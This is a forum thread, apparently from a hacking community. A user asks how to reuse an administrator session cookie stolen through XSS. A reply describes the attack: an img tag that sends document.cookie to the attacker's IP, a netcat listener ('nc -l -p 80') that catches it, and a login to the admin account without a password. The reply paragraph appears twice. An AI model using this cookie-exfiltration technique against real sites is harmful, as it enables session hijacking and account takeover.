Hi guys,
I've got a pretty "mysterious" cookie matter. First, I wish to precise I'm working on a test platform. I found and used a XSS attack to steal a cookie. The problem is : how to use it, so I can connect to the site with the victim identity ? The cookie has been sent to my laptop and captured with netcat. I update the cookie file of Firefox. Since then, firefox refuse to boot. Isn't there any other way?
cookie stolen and firefox
-
- cyber messiah
- Posts: 1201
- Joined: 30 Apr 2006, 16:00
- 17
- Location: 127.0.0.1
Well, it's just an xss attack. I just put in an img balise with the source : http://@IP/document. cookie . I can't put the exact code on the forum, it's filtered. But, I'm sure you fill up the blank.
When, the administrator goes to delete my post on the forum, his browser execute the code and send to my computer the cookie's data of his session. So, I used netcat which is a "socket". So, as I explained before (nc -l -p 80) I received all the request of my victim in my console displayed in text mode. Then, all what is left was to add it to my browser and connect back to the administrator account without to enter any password.
When, the administrator goes to delete my post on the forum, his browser execute the code and send to my computer the cookie's data of his session. So, I used netcat which is a "socket". So, as I explained before (nc -l -p 80) I received all the request of my victim in my console displayed in text mode. Then, all what is left was to add it to my browser and connect back to the administrator account without to enter any password.